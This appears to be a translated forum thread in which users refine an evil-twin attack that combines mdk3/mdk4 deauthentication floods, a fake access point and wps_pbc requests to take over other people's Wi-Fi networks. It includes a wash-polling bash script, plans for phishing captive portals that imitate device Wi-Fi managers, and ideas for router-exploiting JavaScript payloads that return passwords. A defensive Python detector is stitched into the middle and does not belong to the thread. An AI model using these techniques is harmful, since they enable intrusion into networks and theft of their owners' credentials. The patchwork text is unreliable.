That way we can't count on a device connecting to our fake AP to determine whether we should stop the deauth or not

Also, mdk4 has a client whitelist option if that helps


I'm working on the next version of hostbase but I have little time to maintain my project... I agree with you, but making the network open means we have to take care of who is connected to it. For this reason I made a MAC filter directly through hostapd, and if two clients are connected the deauth stops and we send wps_pbc to the target AP.


mac filter


To sum up, from what I see you have good ideas, but you need to test everything you want to do yourself in a terminal before going with hostbase or wifiphisher.... cool


Hostbase rogue AP project with Kali-linux xfce.

Debian--Arch--Kali--

#12 27-01-2022 21:02:48

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

Koala wrote:

For this reason we have to stop mdk3/4 before making a PBC request on the AP when a client connects to the fake AP. Like I said before, if you stop mdk3/4 just when the PBC is alive on the AP, you will have some trouble getting WPS access, because not all APs act the same way, and the deauth with mdk3/4 is very powerful and can crash an AP for a while.

Hmm, I didn't experience any AP crashing because of mdk3/4 ... and let's say that it would crash ... would the crash last for the whole 120 seconds?

Even if that's the case ... checking whether the PBC button was pushed using wpa_cli is troublesome, as we are already in monitor mode while wpa_cli works in managed mode.
And then if we try channel hopping, it would be much more complicated for no reason, because wpa_cli would be running in the background checking for the push of the button,
making mdk3 not possible.
Also, this way we leave a window for the target client to reconnect to their network.
That way the attack becomes less effective

Anyway, if you don't go with wpa_cli I think it is a big mistake, and like Kcdtv said, "wpa_cli is the way" wink

haha maybe, but I am looking for a new way to do it using monitor mode




-1 The version of hostbase for wifislax is completely outdated. Since then I have made a lot of changes to improve channel hopping and it works fine now.
-2 You are confused here. wps_pbc works only when the fake AP with WPA encryption is launched to let the victim connect to us; then, when a client connects to the fake AP, the deauth stops and wps_pbc against the target AP begins.

Hmm, so .. can I use the latest version of hostbase that's not for wifislax on wifislax or not?
Also, how did you get the channel hopping to work using only two adapters .... Can you explain the logic you used?

Also, again about "the fake AP with WPA encryption": if we go down this road, then using the

Hacking Wi-Fi with cached JavaScript Via Browsers Cache Poisoning

is much more effective

So ..... the deauth stops when the client connects to us ... right?
Then what if the client disconnects?
Or what if the channel changes while he is connected to us?
How will mdk3 start again after the 10 minutes have passed?



-1 The hostbase WPS phishing attack can be done with one adapter only if the target AP is on the 2.4GHz frequency. Now in 2022 a lot of APs have two frequencies, one in 2.4GHz and one in 5GHz. We can't do a good deauth on both frequencies with the same adapter, so we need at least 2 adapters. In my personal experience I use 3 adapters: one for the fake AP, the second for the deauth on the 2.4GHz frequency and the third for the deauth on the 5GHz frequency.


-2 In my own experience (I like to spend my time testing things big_smile) you can't launch the fake AP on the same channel as the real AP, because if you want to do an efficient deauth, the channel of the fake AP, which is the same channel as the real AP, will be saturated at the same time and the victim can't join the fake AP.


-3 The best way to test channel hopping is wash; I was using airodump-ng before but finally I use wash. Also, we don't need to restart the fake AP at all; trust me, users in the majority of cases don't shut down their APs.

1. So.... if the network is 2.4GHz only ... can the hostbase WPS phishing attack be done with one adapter + channel hopping?

2. Why? Every single evil twin tool/script out there launches the fake AP on the same channel as the real AP with no problem whatsoever
Check Airgeddon/Fluxion/Wifiphisher

3. How is wash better? And I didn't say shut down but restart .... when they restart their AP they expect the network to disappear from the network list for a while and then appear again ... but when
they see that the network is still there, they will know that something is wrong and the WiFi isn't coming from their router!


In your previous post you mentioned that:


The problem with this is that not all networks have Win10 devices connected to them,
which means we have to set the network to open,
which means that any device would connect to it,
not just the target devices.
That way we can't count on a device connecting to our fake AP to determine whether we should stop the deauth or not

Also, mdk4 has a client whitelist option if that helps


I'm working on the next version of hostbase but I have little time to maintain my project... I agree with you, but making the network open means we have to take care of who is connected to it. For this reason I made a MAC filter directly through hostapd, and if two clients are connected the deauth stops and we send wps_pbc to the target AP.


https://zupimages.net/up/22/04/buaw.png

That would have been useful before 2018, before Android and iOS added MAC address randomization by default, and Windows too ... now it's pretty useless, so....


To sum up, from what I see you have good ideas, but you need to test everything you want to do yourself in a terminal before going with hostbase or wifiphisher.... cool

Haha Thanks

And you haven't even seen this list, where I mentioned the craziest WiFi hacking ideas in existence I could think of.
The one I like most of them is the WiFi manager phishing page,
where we create a WiFi manager captive portal
based on the user agent of the connected device

This way they get fooled and think that they are still in the password entry screen, even though they are in the captive portal
e.g. for Samsung

Also, a friend and I were planning on creating a full-blown
evil twin project that exploits the routers of the targets instead,
by making them disconnect as soon as the captive portal page loads ... so this way they connect back to their network with the page still open, which in turn logs in to the router and sends us the password back

And we were designing it to work in a general way on most routers using iframes and the Google autofill input bars trick, unlike dribble, which works for certain routers only and needs the user to visit an HTTP page
But we stopped since we needed help working on it



Also, about the last part of my last post

You can get the exact router model from WPS, or using the Fing WiFi scanner app, or the 3wifi model detection option

or even do the attack in two parts: one for grabbing the page and sending it back to us for the purpose of detecting which model it is

and the second to make a new page with a JS payload that fits the router model, to exploit it using some bug or default login!

The one I like most of them is the WiFi manager phishing page,
where we create a WiFi manager captive portal
based on the user agent of the connected device

This way they get fooled and think that they are still in the password entry screen, even though they are in the captive portal
e.g. for Samsung


Wifiphisher already has one for Windows

And another for iOS

And another for macOS

But none for Android!

That would have been useful before 2018, before Android and iOS added MAC address randomization by default, and Windows too ... now it's pretty useless, so....


This problem could be fixed if you were able to apply

some of these anti MAC address randomization methods

But it's too complicated

https://petsymposium.org/2021/files/pap … 1-0042.pdf

#13 28-01-2022 14:57:50

kcdtv
Administrator

Registered: 14-11-2014
Posts: 5,701

Re: A possible improvement to the WPS PBC hack

Oh boy! Looks like I missed a lot haha

big_smile
Reaver is also based on wpa_supplicant; Craig Heffner (creator of the first versions) modified some libraries so that it better fits the tool's purpose.

Regarding channel hopping, you can try fixing your interface's channel with iw, for example:

sudo iw dev wlan0 set channel 6 

Or you can edit your wpa_supplicant configuration file to specify a channel.

Also, is there a way to do wpa_cli wps_pbc in monitor mode?

It is possible, but I have no idea how to do it concretely. tongue
You can do what Craig Heffner did with PIN mode: modify wpa_supplicant in PBC mode.
You need a good level of C and a good knowledge of Linux systems.
Or write your own tool "from scratch" with scapy in Python.

I am currently looking for a way to pull off an evil twin with channel hopping + PBC using only a single adapter

It is not possible with a single adapter, because virtual interfaces are tied to the physical interface.
To have one interface on a fixed channel and another doing channel hopping, you absolutely need two WiFi adapters.

Also, how does wpa_cli wps_pbc work? Does it work the same way as

timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

or ... ?

This is explained in the threads I linked you to wink
The "trick" is to use wpa_supplicant's "--debugg" mode with "full verbose".
That way you get everything that happens on the console, and you can "grep" through a pipe to filter it.
That said, it is better to do it with wash, which is much better suited since it is designed for WPS scanning.

I suggested to rofl0r to add it to Reaver, issue num 107. Before I opened that issue, wash wasn't able to detect whether the button had been pushed or not. They just added showing wps_device_password_id in the JSON mode of wash

Well done!

#14 28-01-2022 16:37:24

wifiyeah
User

Registered: 09-01-2022
Posts: 21

Re: A possible improvement to the WPS PBC hack

Reaver issue num 107??

That's a bit old, isn't it?
I think it's at around 700
It's supposed to detect that now, right?

I also tried the command

wash -i mon0 -b xxxxxxxxxx -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

and nothing at all happens,
also -j the way mooooon put it doesn't work, it gives an error,
and what is the timeout for??

Regards

#15 28-01-2022 18:19:33

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

kcdtv wrote:

Reaver is also based on wpa_supplicant; Craig Heffner (creator of the first versions) modified some libraries so that it better fits the tool's purpose.

Oh, even Reaver, which works in monitor mode, is based on wpa_supplicant!! That's just insane

It is not possible with a single adapter, because virtual interfaces are tied to the physical interface.
To have one interface on a fixed channel and another doing channel hopping, you absolutely need two WiFi adapters.

I meant using some method like monitoring for a channel change using the airodump-ng -c option
and killing everything in case the AP is not found on the current channel, to grab the new channel and then restart

But someone told me that they tried it and airodump just messes things up and that it's inconsistent

Also, what do you think about this?

Hacking Wi-Fi with cached JavaScript Via Browsers Cache Poisoning
https://rhaidiz.net/2018/10/25/dribble-stealing-wifi-password-via-browsers-cache-poisoning/

Are you interested in doing something like it but with a captive portal instead?

Getting the model is easy with 3wifi and Fing and WPS

Well done!

Thanks for your help so far

#16 28-01-2022 18:24:15

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

wifiyeah wrote:

Reaver issue num 107??

That's a bit old, isn't it?
I think it's at around 700
It's supposed to detect that now, right?

I also tried the command

wash -i mon0 -b xxxxxxxxxx -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

and nothing at all happens,
also -j the way mooooon put it doesn't work, it gives an error,
and what is the timeout for??

Regards


First, you forgot the -j option!!
And you forgot to change the channel number!!
It should be like this

wash -j -i mon0 -b xxxxxxxxxx -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

Second, update Reaver to the latest version first!

I think it's at around 700

That's because you are discussing the issue on Pixiewps

The timeout option is because wash would never exit if you don't kill it, which means that grep would never echo anything!

You can do it using a .sh file if you want

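#!/bin/bash
# Run wash in JSON mode in the background, writing its output to file.txt
wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 > file.txt &
PIDOFWASH=$!
# Poll the output until the PushButton Device Password ID (0004) shows up
until grep -q '"wps_device_password_id" : "0004"' file.txt; do
    sleep 1
done
echo found
# Stop the background wash process
kill "${PIDOFWASH}"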

Last edited by mooooon (28-01-2022 18:25:19)
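For the monitoring side of what this thread discusses, here is an added example (not code from any poster, nor from hostbase, wash or wifiphisher): it reports each time the PushButton Device Password ID "0004" appears for your own AP and marks the event when a deauthentication burst against that BSSID preceded it. The event tuples, the "bssid" and "channel" keys, the thresholds and all sample values are constructed assumptions; only "wps_device_password_id" and "0004" come from the posts above.

```python
import json
from collections import deque

PBC_ID = "0004"  # Device Password ID "PushButton", the value grepped for above


def pbc_alerts(events, bssid, burst=20, window=10, lookback=600):
    """Return [(ts, kind)] for every time the PBC window opens on `bssid`.

    kind is "pbc_after_deauth" when a deauth burst (>= `burst` frames within
    `window` seconds) hit the same BSSID in the previous `lookback` seconds,
    otherwise "pbc_opened". Thresholds are assumed defaults, tune per site.
    """
    bssid = bssid.lower()
    recent = deque()       # timestamps of deauth frames inside the window
    last_burst = None      # time of the most recent burst
    pbc_active = False     # previous PBC state, so only rising edges alert
    alerts = []
    for ts, source, payload in sorted(events, key=lambda e: e[0]):
        if source == "deauth":
            if payload.lower() != bssid:
                continue
            recent.append(ts)
            while recent and ts - recent[0] > window:
                recent.popleft()
            if len(recent) >= burst:
                last_burst = ts
        elif source == "wash":
            try:
                rec = json.loads(payload)
            except json.JSONDecodeError:
                continue   # truncated or partial line from the scanner
            if not isinstance(rec, dict):
                continue
            if str(rec.get("bssid", "")).lower() != bssid:
                continue
            active = rec.get("wps_device_password_id") == PBC_ID
            if active and not pbc_active:
                flooded = last_burst is not None and ts - last_burst <= lookback
                alerts.append((ts, "pbc_after_deauth" if flooded else "pbc_opened"))
            pbc_active = active
    return alerts


AP = "02:00:00:aa:bb:cc"           # constructed, locally administered address
NEIGHBOUR = "02:00:00:11:22:33"    # constructed


def _wash(bssid, pbc):
    """Build a constructed JSON line shaped like scanner output (assumed keys)."""
    rec = {"bssid": bssid.upper(), "channel": 8}
    if pbc:
        rec["wps_device_password_id"] = PBC_ID
    return json.dumps(rec)


# Constructed observations: (seconds, source, payload). Not captured traffic.
SAMPLE = (
    [(0, "wash", _wash(AP, False))]
    + [(100 + i * 0.2, "deauth", AP) for i in range(40)]  # 40 frames in 8 s
    + [(150, "wash", '{"bssid": "02:00:00:AA'),           # truncated line
       (160, "wash", _wash(NEIGHBOUR, True)),             # someone else's AP
       (170, "wash", _wash(AP, True)),                    # button pressed
       (172, "wash", _wash(AP, True)),                    # still open, no repeat
       (300, "wash", _wash(AP, False)),                   # window closed
       (2000, "wash", _wash(AP, True))]                   # pressed, no flood nearby
)

if __name__ == "__main__":
    for ts, kind in pbc_alerts(SAMPLE, AP):
        print(f"t={ts:>6.1f}s  {kind}")
```
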

#17 29-01-2022 17:34:36

Koala
Very Important User

Registered: 11-09-2016
Posts: 975

Re: A possible improvement to the WPS PBC hack

Hi cool



1. So.... if the network is 2.4GHz only ... can the hostbase WPS phishing attack be done with one adapter + channel hopping?

2. Why? Every single evil twin tool/script out there launches the fake AP on the same channel as the real AP with no problem whatsoever
Check Airgeddon/Fluxion/Wifiphisher

3. How is wash better? And I didn't say shut down but restart .... when they restart their AP they expect the network to disappear from the network list for a while and then appear again ... but when
they see that the network is still there, they will know that something is wrong and the WiFi isn't coming from their router!



For 1: no, it can't work with only one adapter; I always use 2 (or 3 for the 5GHz frequency).


For 2: I don't know how Airgeddon, Fluxion and Wifiphisher work because I only use my tool. They can do the same AP on the same channel maybe because they don't use the same mdk3/4 options as hostbase; like I said, I don't know the other tools very well. I use the -c option, which strongly affects the networks on the same channel; for this reason I recommend setting up the AP on another channel when launching the fake AP (3 or 9 are good because few people are on them). Using the -c option of mdk3 it is possible to attack 2 networks at the same time. I made a video on YouTube to show that, but they deleted my video for "not respecting the rules of the community".... hmm YouTube is a joke.... pam



For 3: I switched from airodump to wash because sometimes, when fixing airodump on one channel, if there are a lot of networks around, the adapter can get stuck on a channel and produce a false positive when the real AP is doing channel hopping. Like you said before, you tried the wifislax version and channel hopping was not working well. Since I started using wash to check the channel of the AP it works fine. Now, including a restart of the fake AP when the real AP is shut down is a good idea. In my personal experience I have not encountered this problem so far. In the last version I included a timeout of 10 minutes, if the WPS push button has not been activated, before restarting the attack.




I am working on a new version of hostbase but I can't say now when I will release it. As I see it, the wps_pbc attack is becoming attractive; the first time I did this attack was in 2015, and I will continue as long as WPS exists, and I hope it will exist for a long time lol

Last edited by Koala (29-01-2022 18:38:55)

#18 04-02-2022 17:50:14

Koala
Very Important User

Registered: 11-09-2016
Posts: 975

Re: A possible improvement to the WPS PBC hack

Hi cool


So I have good news: apparently it is possible to stop the deauth only when the WPS button has been pushed. Before, I stopped the deauth only when a victim joined the fake AP, to let the router wake up and be sure we could launch the wps_pbc request efficiently after that. Now, from what I have tested on my router, it seems to be possible to stop the deauth only when the WPS button has been pushed. I made a sample Ruby script to test this new option using a loop with wash.


wpspbc



But I only did a quick test; it is completely experimental. I have to do a stress test on my router, deauthing it for a while and letting it do channel hopping, to see if that works or not.


If it works I will have to include this option in the next release of hostbase (the most difficult part is when you have to debug a program...)


As you can see, I consider any of your proposals to improve the hostbase project, and I hope you will enjoy the next version if I can include this new test in the whole script smile

@++

Last edited by Koala (04-02-2022 17:53:58)

#19 16-02-2022 21:18:53

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

Koala wrote:

Hi cool

I am working on a new version of hostbase but I can't say now when I will release it. As I see it, the wps_pbc attack is becoming attractive; the first time I did this attack was in 2015, and I will continue as long as WPS exists, and I hope it will exist for a long time lol

haha yeah big_smile:D

#20 16-02-2022 21:24:48

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

Koala wrote:

Hi cool


So I have good news: apparently it is possible to stop the deauth only when the WPS button has been pushed. Before, I stopped the deauth only when a victim joined the fake AP, to let the router wake up and be sure we could launch the wps_pbc request efficiently after that. Now, from what I have tested on my router, it seems to be possible to stop the deauth only when the WPS button has been pushed. I made a sample Ruby script to test this new option using a loop with wash.


https://zupimages.net/up/22/05/d665.png

Whoa, that's hella great! yikes



As you can see, I consider any of your proposals to improve the hostbase project, and I hope you will enjoy the next version if I can include this new test in the whole script smile

@++

sure : )
